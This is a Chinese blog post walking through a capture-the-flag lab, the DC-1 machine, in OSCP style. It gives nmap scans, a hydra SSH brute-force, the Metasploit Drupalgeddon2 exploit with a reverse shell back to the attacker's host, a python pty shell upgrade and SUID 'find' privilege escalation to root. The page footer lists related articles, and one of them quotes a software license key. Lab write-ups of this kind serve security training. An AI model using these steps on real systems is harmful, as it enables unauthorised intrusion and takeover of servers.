OSCP系列靶场-Esay-DC-1保姆级

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量3.6k 收藏
点赞数 1
分类专栏: OSCP 文章标签: web安全 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/131963436
版权

目录

总结

getwebshell → 发现CMSMSF远程反弹SHELL

提 权 思 路 → 发现SUID-FINDFIND提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.167

  • 启动靶机
    获取目标机器IP > 192.168.223.193

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次
sudo nmap --min-rate 10000 -p- 192.168.223.193


sudo nmap -sU --min-rate 10000 -p-  192.168.223.193


通过两次收集到的端口:→22,80,111,46232,53990

目标端口对应服务探测

通常udp端口测不出啥,主要探测tcp

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80,111,46232,53990 192.168.223.193

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(pass)

通过Nmap探测获得SSH的版本信息,可以尝试利用
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 

# 进入msf OpenSSH 6.0p1
msfconsole
# 搜索对应脚本
msf6 > searchsploit openssh 6.0p1

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破发现报错之后进行手动尝试

ssh root<span class="label label-primary">@192.168.223.193</span> -p 22
# 密码尝试
password &gt; root

说明支持密码登录,但是密码不对

22-SSH弱口令爆破(爆破着玩)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.223.193 ssh -s 22

在等待结果的同时让我们尝试使用另外的信息收集

80-HTTP端口的信息收集

访问 http://192.168.223.193:80 发现是一个有名的CMS

信息收集-网站指纹
whatweb -v http://192.168.223.193:80

确认了CMS的版本信息 Drupal 7

漏洞利用-网站指纹

既然确定了版本,直接上工具

msfconsole

searchsploit Drupal 7

查看了一下

其他端口的信息收集

不需要啦~

漏洞利用-getwebshell

觉得还是远程执行的exp比较好

search Drupal 7
&gt;use exploit/unix/webapp/drupal_drupalgeddon2

选一个时间靠后并且Rank比较高的

# 感觉只要设置攻击机以及监听端口,还有目标机器
show options


# 设置个反弹shell
show payloads
set payload 3


# 配置MSF
set lhost 192.168.45.208
set lport 5555
set rhosts 	192.168.230.193
set rport 80
run

成功getwebshell

内网遨游-getshell

交互shell

由于获取的shell交互不友好,使用shell先获取shell

# 利用shell命令获取shell
meterpreter &gt; shell
Process 4192 created.
Channel 0 created.
pwd
/var/www
whoami
www-data
# 利用python获取交互shell -&gt; python失败使用python3
python -c "import pty;pty.spawn('/bin/bash')";
www-data<span class="label label-primary">@DC-1</span>:/var/www$

FLAG1获取

www-data<span class="label label-primary">@DC-1</span>:/var/www$ find / -name local.txt 2&gt;/dev/null
find / -name local.txt 2&gt;/dev/null
/home/local.txt
www-data<span class="label label-primary">@DC-1</span>:/var/www$ cat /home/local.txt
cat /home/local.txt
******************

权限提升

Linux提权-sudo提权尝试(失败)

查找具有sudo权限,且不需要密码的可提权文件

# 利用sudo -l寻找
sudo -l

Linux提权-suid提权尝试

# -perm 文件权限
find / -perm -u=s -type f 2&gt;/dev/null


如果发现有东西的话 访问 https://gtfobins.github.io 寻找

# 查找文件提权
find . -exec '/bin/sh' \;

提权成功

FLAG2获取

# cat /root/proof.txt
cat /root/proof.txt
****************

完结撒花~

杳若听闻
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OSCP靶场5-noontide(irc、UnrealIRCd)
墨痕诉清风的博客
05-09 264
枚举我们从nmap开始,看看哪些端口是开放的。我们看到它只有一个开放端口,它是6667,UnrealIRCd正在运行。我们寻找是否有,并找到[1]。在看到exploit之后,我们看到我们可以在不需要exploit的情况下执行“exploit”手。开发我们让nc听…我们使用nc连接到IRC服务器,一旦连接,我们必须把AB;有效负载\n,我们将用一个命令替换“有效负载”,以便我们从一个反向shell。shell我们得到了shelllocal.txt一旦进入,我们寻找用户标志…权限提升。
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
OSCP推荐靶场-Stapler
qq_63785498的博客
10-07 211
OSCP推荐靶场-Stapler
OSCP-1 环境搭建
weixin_33916256的博客
06-27 638
环境 物理机 kali linux 虚拟机 VMware-Workstation-Full-14.1.1-7528167.x86_64.bundle (官网镜像,KEY : VF19H-8YY5L-48DQY-JEWNG-YPKF6 ) 虚拟机靶机 Kioptrix2014 转载于:https://www.cnblogs.com/lanqie/p/11096343.html...
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 414
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2268
Vulnhub-OSCP靶机实战
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP网络安全领域的一...
OSCP-Exam-Report-Template-Markdown
04-02
我在Markdown中创建了攻击性安全考试报告模板,因此在进行攻击性安全OSCP,OSWE,OSCE,OSEE,OSWP,OSEP,OSED考试时,不再需要LaTeX,Microsoft Office Word,LibreOffice Writer! 现在,您可以在检查报告编辑...
oscp-command-filtering-tool
03-08
oscp命令过滤工具特征根据工具,语言,意图,端口或操作系统轻松过滤命令自动更新kali和受害者IP地址,因此您不必手动修改命令过滤器很容易修改,可以添加/删除内容,也可以从全新开始用法替换所有IP(kali_ip)->要...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1662
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
Stapler#攻略
qq_27466929的博客
11-16 916
vulnhub靶机:Stapler攻略
vulnhub 靶机渗透:Stapler
Mysmycbx的博客
05-29 1140
很有意思的靶机,思路很多,值得学习。
靶场环境搭建——vulhub安装
LSYZWF的博客
10-13 1095
文章目录ubantu系统安装安装软件开启ssh服务备份、修改配置文件开启ssh服务添加开机自启动dnsmq(关闭53端口)安装docker安装docker-compose安装vulhub测试环境搭建tomcat弱口令漏洞环境 ubantu系统安装 镜像链接: 具体安装过程将链接:https://blog.csdn.net/weixin_43252204/article/details/105538909 切换至root用户 安装软件 apt-get update apt-get install ssh a
网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 671
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 961
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1165
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 588
12,对现有网络进行改造升,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值